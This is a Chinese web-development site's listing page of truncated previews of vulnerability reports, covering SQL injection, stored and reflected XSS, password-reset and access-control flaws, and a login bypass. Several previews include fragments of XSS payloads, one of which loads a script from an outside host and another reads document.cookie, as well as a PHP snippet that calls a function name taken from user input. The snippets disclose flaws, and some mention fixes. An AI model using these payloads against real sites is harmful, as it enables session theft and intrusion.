利用万能密码登陆网站后台并漏洞修复 - 网站安关注热度:450
万能密码这是个比较老的漏洞了,如果你的网站存在这个漏洞,结果肯定非常的悲剧。任何一个初学黑客技术的新人都能很轻松的入侵掉你的网站。因为需要入侵存在这种漏洞的网站不..[详情]
PHP/Sqlite下常见漏洞浅析 - 网站安全 - 自学php关注热度:307
0x00 前 12180;SQLite作为 12032;一款轻型数据库,PHP开发人员 12032;定不会陌 12131;生,PHP5后,其已默认集成这个轻巧的内嵌式数据库产品 对于采 12132;用PHP Sqlite的CMS,也存在 12032;些常见的安全威胁..[详情]
Ecmall某处SQL二次注入第三弹 - 网站安全 - 自学p关注热度:154
虽然在20140618的防注入补丁添加了防注入代码 但是还是能勉强绕过。在app my_goods app php中function edit() { $id = empty($_GET[ id ]) ? 0 : intval($_GET[ id ]);..[详情]
搜狗问问一处持久xss - 网站安全 - 自学php关注热度:159
我在百度搜搜xss的时候点击这个页面就弹出xss如果不弹出多点击几次http: wenwen sogou com z q478438204 htm修复方案:删除..[详情]
百度搜索存储型XSS漏洞 - 网站安全 - 自学php关注热度:229
1 在百度搜索的东西,会在百度个人中心留下搜索历史记录2 所以我在百度搜索http: www baidu com s?wd=%22onmouseover =%22var%20s=document create%26%2369%3blement( 39;script 39;);s src= 39;http: fri..[详情]
去买呀网用户密码重置漏洞 - 网站安全 - 自学p关注热度:159
比如有人在去买呀注册了一个账号 但是有人想进他的账号搞破坏怎么办呢??? 只需要一个手机号就行了~~~点击登录忘记密码输入手机号号码接着burp抓包 打开response this request继续跟进..[详情]
安全科普:浮窗登录框的隐患 - 网站安全 - 自学关注热度:190
此文为安全科普系列第三篇,作者EtherDream以图文并茂的形式详细讲解了流量劫持及相关知识,此系列的前两篇文章见文章末的传送门。传统的登录框在之前的文章流量劫持危害详细讲解..[详情]
豆瓣某功能平行权限漏洞 - 网站安全 - 自学php关注热度:158
漏洞证明:http: thing douban com subject 2762 question 1693 http: thing douban com subject 2762 answer 15571 edit修复方案:加强权限控制..[详情]
TerraMaster NAS网络存储高危漏洞 - 网站安全 - 自学关注热度:187
TerraMaster铁威马是一个专业的国际存储品牌,专注于为全球用户提供专业的私有云存储设备,包括高效能、安全可靠、多功能以及环保的NAS网络云储存服务器和DAS直连式存储装置。Terra..[详情]
某通用型企业建站系统2处 sql注入 - 网站安全 -关注热度:176
rt详细说明:新秀企业网站系统PHP版是一款简洁易用、方便二次开发的PHP企业网站系统。系统安装时有Mysql和Access两种数据库可供选择;后台功能齐全,操作简便,可扩展性良好,具有较..[详情]
某OA系统两处SQL注射到GetShell(含详细修复方案)关注热度:240
捡漏、前者提交是前台显示我这也走前台吧。详细说明:前人漏洞: WooYun: 某OA系统SQL注射+后台getshell 厂商:北京联杰海天科技有限公司 官网:http: www haitiansoft com 产品:OA协同办公系统..[详情]
U-mail某鸡肋代码注入导致敏感信息泄漏(demo测试成关注热度:224
漏洞文件:api api php:670行$do = trim( $_GET[ 39;do 39;] );if ( function_exists( $do ) ){ $do( );}else{ echo param_error;}exit( );直接来个动态函数,可惜没有参数可控,..[详情]
如何轻松防范DEDECMS(织梦)挂马 - 网站安全 - 自学关注热度:158
曾经有许朋友的DEDE后台程序很容易被挂马,当然每个人都是通过一点一点积累经验,从被挂到能轻松防范,这需要一个逐渐积累的过程,任何事情都不是一蹴而就的,所以我们只要研究了方法..[详情]
19楼内网漫游记 - 网站安全 - 自学php关注热度:210
关注19楼好久了,在杭州它的群体覆盖面至少达90%以上,本菜鸟平时也喜欢去上面转一转(PS:杭州美女大多喜欢逛19楼)!自从来到wooyun,一直想对19楼做个安全检测(虽然本人技术很菜),..[详情]
搜狗拼音一处SQL盲注及反射型XSS - 网站安全 - 自关注热度:183
反射型XSS一枚,建议再找找存储型的:http: pinyin sogou com wurehanzi libs Pagination examples ArrayData php?page=1 39;%22()%26%25ScRiPt%20alert(document cookie) ScRiPt盲注点,参数eidhttp: pi..[详情]
站长推荐
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com